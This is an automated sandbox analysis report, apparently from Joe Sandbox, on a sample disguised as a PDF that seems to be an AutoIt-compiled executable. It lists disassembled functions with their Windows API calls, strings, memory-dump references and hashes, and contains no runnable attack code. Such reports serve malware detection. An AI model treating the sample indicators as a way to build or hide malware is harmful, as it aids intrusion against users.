                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    • Opcode ID: 22f599d7910ed36c0b68bbd36a479740fb20104ffdd13b513c6ef80d66f602b0
                                                    • Instruction ID: d3771dcc4807a765c6a7ba6af10e57ef48809c86f04729fb3d5fddcf80714528
                                                    • Opcode Fuzzy Hash: 22f599d7910ed36c0b68bbd36a479740fb20104ffdd13b513c6ef80d66f602b0
                                                    • Instruction Fuzzy Hash: D411AC74501221BBDF268F61C888EFBFBACFF06755F10822AF50596540D370A942C6E0
                                                    Function 0036A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003737A7
                                                    • ___raise_securityfailure.LIBCMT ref: 0037388E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: (@
                                                    • API String ID: 3761405300-174977431
                                                    • Opcode ID: 4700454c7e4df5a7f8004b8caccd018d59beaaa45b30b57e028d211be951c326
                                                    • Instruction ID: 9349a2046ab30b1ae873ba286119afeaf9fa717543a938db34f4eedc6df52d38
                                                    • Opcode Fuzzy Hash: 4700454c7e4df5a7f8004b8caccd018d59beaaa45b30b57e028d211be951c326
                                                    • Instruction Fuzzy Hash: 2921F0F5511204DAE715DF55EA997503BB4BB48310F20983AE908BB3A0E7F4A980CF9D
                                                    Function 0039A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0039A84E
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0039A88B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: 44b33e43813e67f5f83c63b7bfd25820d104852b6e451d574778b99a7ebd253d
                                                    • Instruction ID: d762985a7e6169af9c82e2d00551f3f2a1a4789f7da5a3ae0d1a1e29beb619e7
                                                    • Opcode Fuzzy Hash: 44b33e43813e67f5f83c63b7bfd25820d104852b6e451d574778b99a7ebd253d
                                                    • Instruction Fuzzy Hash: 8F01D275204304ABCB22AF68C88AFA9B768EF44310F10866AF5169B3D1D771E801C792
                                                    Function 0037B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0037B7EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3850602802-1403004172
                                                    • Opcode ID: f0ba1e32af0f940a49d78a857a2438029949b137ce9c8f6ba6c77e813827b887
                                                    • Instruction ID: f2e1a435262e0bef405adba08e36609703b6769899a131b2a994cb4efafc23a5
                                                    • Opcode Fuzzy Hash: f0ba1e32af0f940a49d78a857a2438029949b137ce9c8f6ba6c77e813827b887
                                                    • Instruction Fuzzy Hash: 89014C71611118ABCB56EBA4CC42EFE73BDBF06310B04461CF4615B2D1DF746808CB50
                                                    Function 0037B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0037B6EB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3850602802-1403004172
                                                    • Opcode ID: a1d30ac80c5785a014163feb6107f97374b4be0f5b032fba8e3aef7e382a5b19
                                                    • Instruction ID: 0ed0194c3e140a00e11362c6de6e4a8974177f9c9c1f5fcb7b18ef4ef55995c2
                                                    • Opcode Fuzzy Hash: a1d30ac80c5785a014163feb6107f97374b4be0f5b032fba8e3aef7e382a5b19
                                                    • Instruction Fuzzy Hash: 53018F71642008ABCB56EBA4C952BFFB3BC9F05340F104029B606BB191DF986E188BA5
                                                    Function 0037B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0037B76C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 3850602802-1403004172
                                                    • Opcode ID: 43870fca7b7319370d55ba3c8337f162e30ff4abe5ac4199b0e2aead00d145cd
                                                    • Instruction ID: 507fa39cf4ceae2af9c3d6b86355d3e7efca1f2f0ebb9f273e4c5c9263b65a44
                                                    • Opcode Fuzzy Hash: 43870fca7b7319370d55ba3c8337f162e30ff4abe5ac4199b0e2aead00d145cd
                                                    • Instruction Fuzzy Hash: 5A01A271641108ABCB16E7A4C902FFFB3BC9F05344F504019B505BB192DB686E1987B5
                                                    Function 00364D7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: "@
                                                    • API String ID: 3494438863-895456044
                                                    • Opcode ID: 70f69644cf62da4a63e576a51ae317deeeb260b8c81c07dd80bfeb412e1372b5
                                                    • Instruction ID: cfa4246231ec286e8e579aba6cb1e28f9c72bf40a7d5367bc6583e78265703e7
                                                    • Opcode Fuzzy Hash: 70f69644cf62da4a63e576a51ae317deeeb260b8c81c07dd80bfeb412e1372b5
                                                    • Instruction Fuzzy Hash: 98F02870E186018AE3178B59BE4566667D8E700760B10C06FF200DE1CEE770C8418798
                                                    Function 00344024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00340000,00000063,00000001,00000010,00000010,00000000), ref: 00344048
                                                    • EnumResourceNamesW.KERNEL32(00000000,0000000E,003867E9,00000063,00000000,75C10280,?,?,00343EE1,?,?,000000FF), ref: 003B41B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: EnumImageLoadNamesResource
                                                    • String ID: >4
                                                    • API String ID: 1578290342-2218818388
                                                    • Opcode ID: fda48df709b639b5de687b0f5ee7e98a7f8701c70c15d30f293a91b00064b0a3
                                                    • Instruction ID: 12fe98e6c61eb22d38899267f08047ce348cf695278d5de4b2ab386809b91ce9
                                                    • Opcode Fuzzy Hash: fda48df709b639b5de687b0f5ee7e98a7f8701c70c15d30f293a91b00064b0a3
                                                    • Instruction Fuzzy Hash: 22F0963164032477E6214B19BD46FD23B9DD709BB5F10452AF314FA5E0D3F0A0809798
                                                    Function 00387744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    • Opcode ID: 581c06c8754f898ee1dd0324acd7b5bef9f3d3295e74dc49ec9e05e322ba1bcb
                                                    • Instruction ID: e2440eba2cf6b1338438ec1c7503f98ee7ac81953da5e414d8ba1e905e751a49
                                                    • Opcode Fuzzy Hash: 581c06c8754f898ee1dd0324acd7b5bef9f3d3295e74dc49ec9e05e322ba1bcb
                                                    • Instruction Fuzzy Hash: A6E0927760432827D721EAA59C49E97FBACEB51760F01006AFA05E3041D670E601C7D4
                                                    Function 0037A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0037A63F
                                                      • Part of subcall function 003613F1: _doexit.LIBCMT ref: 003613FB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    • Opcode ID: 88be15819ade2edcfc3953284cd5a15cf237fc72c8e34ee1e71fac72516bd88e
                                                    • Instruction ID: 20ce5ea28145a312a6572c1af6b8b1f8ba9d5cc01c8184cb5818de828a0412fd
                                                    • Opcode Fuzzy Hash: 88be15819ade2edcfc3953284cd5a15cf237fc72c8e34ee1e71fac72516bd88e
                                                    • Instruction Fuzzy Hash: B2D02B323C031837C22336A87C07FD9354C8B05B51F044032FB0CDD5C249D3995042D9
                                                    Function 003BAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 003BACC0
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 003BAEBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: DirectoryFreeLibrarySystem
                                                    • String ID: WIN_XPe
                                                    • API String ID: 510247158-3257408948
                                                    • Opcode ID: a8491b2e3639f8c842cfd7d87abd0aecb32d001855f3d6d606758bda39241b09
                                                    • Instruction ID: 4d877a0a0139c94584bfccc4c6e577a3bc3764c092f4248051f68fcfb33c1fef
                                                    • Opcode Fuzzy Hash: a8491b2e3639f8c842cfd7d87abd0aecb32d001855f3d6d606758bda39241b09
                                                    • Instruction Fuzzy Hash: D1E03970C00909AFCB12DBA4DA449ECFBBCAB48705F148092E602F2960DB705A84DF22
                                                    Function 003A8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86A2
                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003A86B5
                                                      • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
                                                    • Instruction ID: 70816d907cf2c38a67fa651dcc2f08a81d29116e26b6bd7fbdc1c26cac72292e
                                                    • Opcode Fuzzy Hash: 8f04d1d87f9db10745301e602af0025562a04ac60f6ff79eb4925479d880a2c9
                                                    • Instruction Fuzzy Hash: E8D01271385318B7E26A77709C4BFD6BA1C9B45B11F110825F749EA2D0C9F4F950C754
                                                    Function 003A86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003A86E2
                                                    • PostMessageW.USER32(00000000), ref: 003A86E9
                                                      • Part of subcall function 00387A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00387AD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                                    • Instruction ID: 69ad23def51579e4cc26caeee245d4c4a1c2737a57b0a98f2c0cd1088cb930af
                                                    • Opcode Fuzzy Hash: 4c5bfe24dd13b932ec3aedb2dc320138522e8d0bf64d9c384de85e3fbb266005
                                                    • Instruction Fuzzy Hash: 24D0C9713853186BE26A67709C4BFC6BA189B49B11F510825B749EA2D0C9A4F950C758